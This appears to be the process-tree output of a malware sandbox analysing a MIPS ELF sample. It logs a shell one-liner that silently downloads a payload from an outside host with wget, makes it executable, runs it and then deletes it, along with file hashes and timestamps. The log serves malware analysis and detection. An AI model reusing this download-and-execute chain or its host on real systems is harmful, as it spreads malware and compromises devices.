                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                Start time (UTC):05:44:12
                Start date (UTC):10/05/2025
                Path:/tmp/mipsel.elf
                Arguments:-
                File size:5773336 bytes
                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                Start time (UTC):05:44:12
                Start date (UTC):10/05/2025
                Path:/bin/sh
                Arguments:/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):05:44:12
                Start date (UTC):10/05/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):05:44:12
                Start date (UTC):10/05/2025
                Path:/usr/bin/wget
                Arguments:wget -q http://gay.energy/.../vivid -O .....
                File size:548568 bytes
                MD5 hash:996940118df7bb2aaa718589d4e95c08

                Start time (UTC):05:44:13
                Start date (UTC):10/05/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):05:44:13
                Start date (UTC):10/05/2025
                Path:/usr/bin/chmod
                Arguments:chmod 777 .....
                File size:63864 bytes
                MD5 hash:739483b900c045ae1374d6f53a86a279

                Start time (UTC):05:44:13
                Start date (UTC):10/05/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):05:44:13
                Start date (UTC):10/05/2025
                Path:/bin/sh
                Arguments:/bin/sh ./.....
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):05:44:13
                Start date (UTC):10/05/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):05:44:13
                Start date (UTC):10/05/2025
                Path:/usr/bin/rm
                Arguments:rm -rf .....
                File size:72056 bytes
                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                Start time (UTC):05:44:12
                Start date (UTC):10/05/2025
                Path:/tmp/mipsel.elf
                Arguments:-
                File size:5773336 bytes
                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                Start time (UTC):05:44:12
                Start date (UTC):10/05/2025
                Path:/tmp/mipsel.elf
                Arguments:-
                File size:5773336 bytes
                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                Start time (UTC):05:44:12
                Start date (UTC):10/05/2025
                Path:/tmp/mipsel.elf
                Arguments:-
                File size:5773336 bytes
                MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9